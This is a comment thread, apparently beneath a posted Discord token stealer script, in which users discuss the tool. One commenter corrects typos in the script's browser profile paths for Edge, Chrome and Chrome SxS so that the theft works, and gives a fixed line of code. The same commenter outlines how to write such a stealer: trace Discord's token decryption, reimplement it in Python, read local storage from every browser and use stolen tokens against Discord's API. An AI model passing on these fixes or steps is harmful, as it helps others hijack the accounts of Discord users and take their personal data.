Path Typos

[rubyswolf]

just wanted to point out some small typos in the paths object that will cause issues on line 54 at the end the microsoft edge path ends with "Defaul" forgetting the t on the end so that this will end up not grabbing from edge. It should be '\\Microsoft\\Edge\\User Data\\Default' on line 51 you are missing the "\\Default" on the end all together, it should be '\\Google\\Chrome SxS\\User Data\\Default' this caused an error the first time I tried it

[luvpoohbear]

any recommendations for someone trying to get started writing own?

[rubyswolf]

any recommendations for someone trying to get started writing own?

sorry but I'm not exactly sure what you mean here. if you mean writing your own discord token stealer then I really wouldn't recommend doing something that's already been done. because as discord tries to combat this they add extra encryption for extra protection and it's a real pain to work with, and if you're just getting started then it's really not worth it.

[luvpoohbear]

bro im gonna be 100% i have no idea what i was sayin i made edibles last night lmfao, simple question tho you ever think discords ever gonna actually stop these from being used? if not why or is there a good source to learn about this sorta stuff really cant find anything useful, sorry for bombarding questions just trying to take in as much as i can tbh

[rubyswolf]

notice how this one says v2? that's because version 1 was patched and discord made it harder to steal and stopped all existing stealers. so that is proof that yeah they do care to some degree.

[rubyswolf]

if you want to learn how this script was made and it's origin then the challenge of stealing the token from scratch is a big one. first of all you'd note that discord is fully web technology and the desktop app is made in electronJS. so you'd probably have dig quite deep through obfuscated JavaScript which requires good knowledge of JavaScript and some determination. the token is stored in the local storage so the easiest option is to open the web version. then you'd, press Ctrl+shift+I or f12 to open devtools and dig through the script files to try to find how it decrypts the token from local storage and then write the code of decryption In python. finally you just get the local storage of every browser (including the discord app) and then run the decryption on it to steal the token. additionally apparently from what this script does, you can use the stolen token to make API calls to get extra data about the username, email and nitro status.

this is some pretty advanced stuff and I would really recommend you get good at python and way better at JavaScript before even bothering trying.

[rubyswolf]

also guess who just found yet another typo, you really need to proofread this stuff. line 52, when you concatenate chrome with default, there is no slash in between them so you get the path ending in "User DataDefault" and not "User Data\Default". plus what is the point of the chrome variable since it is only used once? you can just follow the format of every other location and it would've been easier to spot the bug. to fix just replace the line with the following and remove the chrome variable 'Chrome': local + "\\Google\\Chrome\\User Data\\Default",